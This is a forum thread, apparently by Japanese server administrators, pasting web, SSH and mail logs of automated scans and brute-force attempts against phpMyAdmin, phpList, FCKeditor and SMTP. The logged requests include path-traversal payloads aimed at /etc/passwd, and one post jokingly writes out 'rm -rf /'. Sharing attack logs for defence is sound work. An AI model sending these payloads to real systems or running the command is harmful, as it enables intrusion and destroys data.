89.149.242.190 [22/Feb/2011:02:54:50 +0900] "GET /webdb/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:50 +0900] "GET /websql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:56 +0900] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:02 +0900] "GET /~/PMA/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:08 +0900] "GET /~/admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:14 +0900] "GET /~/myadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:20 +0900] "GET /~/phpadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:26 +0900] "GET /~/phpmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:32 +0900] "GET /~/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:38 +0900] "GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 400 REF:-
89.149.242.190 [22/Feb/2011:02:55:44 +0900] "GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 400 REF:-
89.149.242.190 [22/Feb/2011:02:55:50 +0900] "GET :81/phpmyadmin/scripts/setup.php HTTP/1.1" 400 REF:-

I thought attacks only happened in the movies.

They must really love phpmyadmin.

i125-202-167-50.s10.a029.ap.plala.or.jp

89.106.13.209 - - [24/Feb/2011:03:08:57 +0900] "GET //phpmyadmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @
WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:08:57 +0900] "GET //phpMyAdmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:08:58 +0900] "GET //admin/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:08:59 +0900] "GET //dbadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:08:59 +0900] "GET //myadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:00 +0900] "GET //mysql/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:01 +0900] "GET //mysqladmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:01 +0900] "GET //phpadmin/ HTTP/1.1" 403 211 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:02 +0900] "GET //pma/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:03 +0900] "GET //phpdb/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:03 +0900] "GET //db/ HTTP/1.1" 403 205 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:04 +0900] "GET //mysqladmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:05 +0900] "GET //SQL/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:05 +0900] "GET //padmin/ HTTP/1.1" 403 209 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:06 +0900] "GET //pmadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:07 +0900] "GET //webdb/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ 
WhiteHat Team - www.whitehat.ro"
Already posted, maybe?

Not so much already posted; it feels like they're just hitting everything indiscriminately now.
But they haven't come to my server for a few weeks.

::1 - - [25/Feb/2011:04:07:33 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)"

Are you blind or what?

77.222.43.19 - - [25/Feb/2011:22:57:37 +0900] "GET //phpmyadmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:38 +0900] "GET //phpMyAdmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:38 +0900] "GET //MyAdmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:41 +0900] "GET //myadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:44 +0900] "GET //pma/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
77.222.43.19 - - [25/Feb/2011:22:57:45 +0900] "GET //mysql/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
I'm blocking them with mod_geoip so there's no actual harm, but they're back again.

That // is annoying, isn't it.
Makes me think they're stupid.

195.7.10.56 [26/Feb/2011:13:38:52 +0900] GET //phpMyAdmin/scripts/setup.php HTTP/1.1 404 226
195.7.10.56 [26/Feb/2011:13:38:52 +0900] GET //phpMyAdmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:38:53 +0900] GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1 404 228
195.7.10.56 [26/Feb/2011:13:38:54 +0900] GET //phpadmin/scripts/setup.php HTTP/1.1 404 224
195.7.10.56 [26/Feb/2011:13:38:55 +0900] GET //phpmyadmin/scripts/setup.php HTTP/1.1 404 226
195.7.10.56 [26/Feb/2011:13:38:55 +0900] GET //phpmyadmin.old/scripts/setup.php HTTP/1.1 404 230
195.7.10.56 [26/Feb/2011:13:38:56 +0900] GET //old.phpmyadmin/scripts/setup.php HTTP/1.1 404 230
195.7.10.56 [26/Feb/2011:13:38:57 +0900] GET //phpmyadmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:38:58 +0900] GET //phpmyadmin-2/scripts/setup.php HTTP/1.1 404 228
195.7.10.56 [26/Feb/2011:13:38:58 +0900] GET //phpmyadmin1/scripts/setup.php HTTP/1.1 404 227
195.7.10.56
[26/Feb/2011:13:38:59 +0900] GET //phpmyadmin2/scripts/setup.php HTTP/1.1 404 227
195.7.10.56 [26/Feb/2011:13:39:00 +0900] GET //pma/scripts/setup.php HTTP/1.1 404 219
and things like
46.4.50.141 [27/Feb/2011:03:17:47 +0900] GET //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 219
46.4.50.141 [27/Feb/2011:03:17:47 +0900] GET //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 224
46.4.50.141 [27/Feb/2011:03:17:48 +0900] GET //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 218
46.4.50.141 [27/Feb/2011:03:17:49 +0900] GET //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 221
46.4.50.141 [27/Feb/2011:03:17:49 +0900] GET //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 221
46.4.50.141 [27/Feb/2011:03:17:50 +0900] GET //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 213
46.4.50.141 [27/Feb/2011:03:17:50 +0900] GET //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 226
46.4.50.141 [27/Feb/2011:03:17:51 +0900] GET //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 222
46.4.50.141 [27/Feb/2011:03:17:51 +0900] GET //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 212
get logged about once a day, I guess.
They come at SSHD too.
reverse mapping checking getaddrinfo for 122.3.134.131.pldt.net [122.3.134.131] failed - POSSIBLE BREAK-IN
ATTEMPT! : 202 time(s)
reverse mapping checking getaddrinfo for 178-162-164-39.local [178.162.164.39] failed - POSSIBLE BREAK-IN ATTEMPT! : 55 time(s)
Address 64.235.57.228 maps to lasvegas-nv-datacenter.com, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT! : 1 time(s)

# ping localhost
# rm -rf /

Attack on my mail server
113.244.196.159
I'm bouncing more than 10,000 messages a day and they still don't learn lol

193.252.15.94
lputeaux-151-43-28-94.w193-252.abo.wanadoo.fr
89.2.94.115
ip-115.net-89-2-94.rev.numericable.fr

162.78.3.110.ap.yournet.ne.jp, apparently

74.3.202.84 - - [20/Mar/2011:08:01:18 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"
74.3.202.84 - - [20/Mar/2011:08:01:20 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3"

Go marry PMAN

Since a little after 21:00 last night, endless attacks on my SMTP server every 2-3 seconds
> "2011-04-04 21:15:49","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:51","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:53","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04
21:15:55","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:15:57","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:00","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:02","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:04","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:06","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:08","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:10","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:12","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:14","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:16","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
> "2011-04-04 21:16:18","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0",""
(rest omitted)

Found something I'm not used to seeing
> 2011/04/10,07:49:13,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/","","1.1",200,8097
> 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
> 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077
>
2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 
2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 
2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 
2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 49.212.19.24 www1230ub.sakura.ne.jp 49.212.21.126 www1102ud.sakura.ne.jp 41.89.28.4 - - [30/Apr/2011:14:35:13 +0900] "GET /webdav/test HTTP/1.1" 404 289 "-" "-" 217.243.187.36 - - [30/Apr/2011:23:45:49 +0900] "GET /webdav/test HTTP/1.1" 404 289 "-" "-" 81.201.60.163 - - 
[02/May/2011:05:29:09 +0900] "GET /sd/1M HTTP/1.1" 404 280 "-" "-" 195.246.217.24 - - [03/May/2011:07:51:26 +0900] "GET /user/soapCaller.bs HTTP/1.1" 404 296 "-" "Morfeus Fucking Scanner" 123.30.109.21 - - [04/May/2011:17:00:57 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:00:57 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:00:58 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:01:06 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:01:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:01:07 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu" 46.28.109.24 [2011.4/03-12:12:23 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:23 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:29 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:24 +0900] "GET //admin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:35 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:41 +0900] "GET //mysql/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:47 +0900] "GET //mysqladmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:53 +0900] "GET //phpadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:59 +0900] "GET //pma/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:05 +0900] "GET //phpdb/ HTTP/1.1" 404 REF:- 46.28.109.24 
[2011.4/03-12:13:11 +0900] "GET //db/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:17 +0900] "GET //mysqladmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:23 +0900] "GET //SQL/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:29 +0900] "GET //padmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:35 +0900] "GET //pmadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:41 +0900] "GET //webdb/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:45:58 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:45:59 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:00 +0900] "GET //pma/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:05 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:11 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:17 +0900] "GET //phppgadmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:23 +0900] "GET //PMA/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:29 +0900] "GET //admin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:35 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:55:54 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:55:54 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:55:55 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:56:01 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:56:07 +0900] "GET //pma/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:56:13 +0900] "GET //mysql/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:03 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:04 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:05 +0900] "GET //pma/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:10 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:16 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:- 58.83.227.150 
[2011.4/13-22:18:22 +0900] "GET //phppgadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:28 +0900] "GET //PMA/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:34 +0900] "GET //admin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:41 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/20-13:22:53 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/20-13:22:52 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/30-00:16:47 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
123.30.109.21 [2011.4/30-00:16:48 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/30-00:16:48 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:05 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:05 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
113.57.252.72 [2011.5/04-11:08:06 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:12 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-

Mysterious requests from googlebot. What is this...
66.249.69.28 - - [05/May/2011:20:52:21 +0900] "GET /upload/viewer_board/wdviewer.exe HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html )"
66.249.69.28 - - [05/May/2011:20:52:24 +0900] "GET /upload/viewer_board/HwpViewer2007.exe HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html )"
